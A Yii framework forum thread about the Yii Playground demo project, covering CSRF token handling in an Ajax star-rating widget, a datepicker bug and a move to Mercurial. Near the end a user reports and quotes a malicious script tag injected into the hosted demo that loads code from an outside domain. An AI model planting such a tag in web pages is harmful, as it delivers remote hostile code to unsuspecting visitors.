[junxiong]

Hello all,

At last I've successfully activating CSRF in YiiPlayGround without any major problem. Few months ago, I've tried to enabling it but then it made CStarRating ajax post become unrunnable, so I disabled it back.

As long as we stick the way of Yii in creating form (using CHtml::beginForm()) then it will run like usual. The problem is because of the CSRF activated, every form will have a token which will validated on the controller. Since my CStarRating using POST when running Ajax (without putting token) it cannot be run. Now I got the solution by putting it manual in my parameter like this :

$this->widget('CStarRating',array(
    'name'=>'ratingAjax',
    'callback'=>'
        function(){
                $.ajax({
                    type: "POST",
                    url: "'.Yii::app()->createUrl('UiModule/ui_other/starRatingAjax').'",
                    data: "'.Yii::app()->request->csrfTokenName.'='.Yii::app()->request->getCsrfToken().'&rate=" + $(this).val(),
                    success: function(msg){
                                $("#result").html(msg);
                        }})}'
  ));

Hope this is the right approach...

[junxiong]

Just added new examples, CTabView!!

By the way, I don't know why but CJuiDatePicker is error in my computer
it said :

Spoiler

Quote

Description
Undefined index: name

Source File

/media/Data/Projek/framework/zii/widgets/jui/CJuiDatePicker.php(108)

00096: $this->options['defaultDate'] = $this->model->$attribute;
00097: }
00098: else
00099: {
00100: echo CHtml::hiddenField($name,$this->value,$this->htmlOptions);
00101: $this->options['defaultDate'] = $this->value;
00102: }
00103:
00104: if (!isset($this->options['onSelect']))
00105: $this->options['onSelect']="js:function( selectedDate ) { jQuery('#{$id}').val(selectedDate);}";
00106:
00107: $this->htmlOptions['id'] = $id = $this->htmlOptions['id'].'_container';
00108: $this->htmlOptions['name']= $name = $this->htmlOptions['name'].'_container';
00109:
00110: echo CHtml::tag('div', $this->htmlOptions);
00111: }
00112:
00113: $options=CJavaScript::encode($this->options);
00114: $js = "jQuery('#{$id}').datepicker($options);";
00115:
00116: if (isset($this->language))
00117: {
00118: $this->registerScriptFile($this->i18nScriptFile);
00119: $js = "jQuery('#{$id}').datepicker(jQuery.extend({showMonthAfterYear:false}, jQuery.datepicker.regional['{$this->language}'], {$options}));";
00120: }

[Giovanni D.]

 junxiong, on 08 January 2011 - 07:32 AM, said:

By the way, I don't know why but CJuiDatePicker is error in my computer

maybe is a small bug ($this->htmlOptions['name'] not defined?) Have you error_reporting set to E_ALL in your php.ini?

Anyway, I've commited a couple of small fixes thanks for your examples! I'm also going to update the live demo.

Just a question: why did you put the "csrf" view in the "cookie" folder? From what I know csrf is not related with cookies and could be confusing Anyway I think this one is an important and useful example!

bye,
Giovanni.

p.s.
please also note that as you put the csrf component in config/development.php it won't be enabled on the live demo cause that file is not loaded on the live demo. (see here)

[junxiong]

 Virtual DarKness, on 09 January 2011 - 10:13 AM, said:

maybe is a small bug ($this->htmlOptions['name'] not defined?) Have you error_reporting set to E_ALL in your php.ini?

Anyway, I've commited a couple of small fixes thanks for your examples! I'm also going to update the live demo.

Just a question: why did you put the "csrf" view in the "cookie" folder? From what I know csrf is not related with cookies and could be confusing Anyway I think this one is an important and useful example!

bye,
Giovanni.

p.s.
please also note that as you put the csrf component in config/development.php it won't be enabled on the live demo cause that file is not loaded on the live demo. (see here)

Yeah, I set it E_ALL, if so, then this might bug from Yii Framework?

Hm... I thought CSRF is security involving cookie, that's why the view and controller's name I give "cookie".. Or shall I just set the name to csrf ??

[junxiong]

New example, CTextHighlight...

But I wonder, why some languages it still display plain text? I put only supported languages, but Java, CPP, Ruby, python doesn't seems to be highlighted. Any idea?

[samdark]

No CSS for these.

[Giovanni D.]

 junxiong, on 23 January 2011 - 02:56 AM, said:

New example, CTextHighlight...

Hi,
sorry for the late reply.. had few time to follow this during the last weeks. Anyway now the live demo has yii-1.1.6.r2877 and I've updated it with the CTextHighlight example, thanks

bye,
Giovanni.

[junxiong]

Somehow the jqgrid code in my localhost is not running anymore...
it produce error like this

Quote

Constant _CHECK_JS_PARAMETERS_ already defined

I will find out what's going first...

[junxiong]

 junxiong, on 25 February 2011 - 09:54 AM, said:

Somehow the jqgrid code in my localhost is not running anymore...
it produce error like this


I will find out what's going first...

Geez, seems it's already quite a time nobody touch this project. Everybody must be very busy. Hopefully in this few days, I could put down some example again~
(hopefully)

[Giovanni D.]

Hello,
yes for now I'm busy with other projects and things but I think I'll keep working on it in the future, as I'm done with a couple of other stuff.

In the meantime I've changed the requirements to join the project as many people asks me to join and then they doesn't commit anything, so I've added this to the wiki:

Quote

Note: since many users asked to join but then didn't contributed in any way, I urge you to first download the source from svn and start working on it locally (read-only access is open to everyone) and then, when you will have something to commit, go on and require to join. Thanks.

http://code.google.c...round/wiki/Join

I hope my English isn't too bad


I also plan to release another snapshot package soon or later and I'll do it but have no estimated time for this.

bye,
Giovanni.

[jacmoe]

Since the project is on Google.code, how about switching to Mercurial?

That way people don't have to join the project, because we can save the changes as a bundle which one of the project members can apply.
That would solve the issues I think.
The kind of project that the Yii Playground is lends itself extremely well to a distributed version system IMO.

People who are going to say: No.. Go Git! should realise that Google.code offers Mercurial, not Git.
So going Mercurial would mean that the project stays where it is.

[Giovanni D.]

Hehe,
I'm not a fan of Git, so for me Mercurial won't be a problem I guess.

The good thing about svn is the integration with netbeans that I don't know if it is available for Mercurial.. but I saw you have TortoisHG that should be similar to TortoiseSVN I guess.

Also, changing from svn to mercurial would require some effort to update the documentation (at this time there is also a screencast that explain how to get started with svn for windows users)

Anyway, about svn write access... as I wrote the point is just to have something the user can commit as I enable him as a member of the project to avoid that people asks to join and then doesn't provide any contribution. But the Mercurial idea sounds good so I look forward to hear an opinion also from other users like junxiong

bye,
Giovanni.

[jacmoe]

They use Mercurial themselves (NetBeans team), so - of course - there is excellent Mercurial support built into the IDE.

[intel352]

Agreed with mercurial suggestion. Netbeans works great with hg.
Also, users should be able to still access svn read-only up to the point that it was converted.

For contribution, users can also fork the main repo if they have ongoing contributions.

[junxiong]

I've never worked with Mercurial before. But I won't mind to learn new thing. As long it is easy for everyone, I will go with everyone

[Giovanni D.]

Hello,
so I think we can go to mercurial; just have some questions to better understand how it will work.. please let's continue this discussion here.

Thanks.

bye,
Giovanni.

[blacksheep]

thank you / GRAZIE!

[Chelo]

thanks, nice idea

[zitter]

Hey, be careful with site http://www.yiiplaygr....cubedwater.com I think there is a malicious script inside, look at the end of the code:
<script src="http://tri25ala.rr.nu/mm.php?d=x1"></script>


ciao!
danilo

[Giovanni D.]

Thanks zitter for reporting it; this seems to be only related to the hosted version, not to the source on svn (we think it is a problem of the hosting provider) and we are going to clean up the code.. (the hosting for the live demo is kindly provided by jonah)

bye,
Giovanni.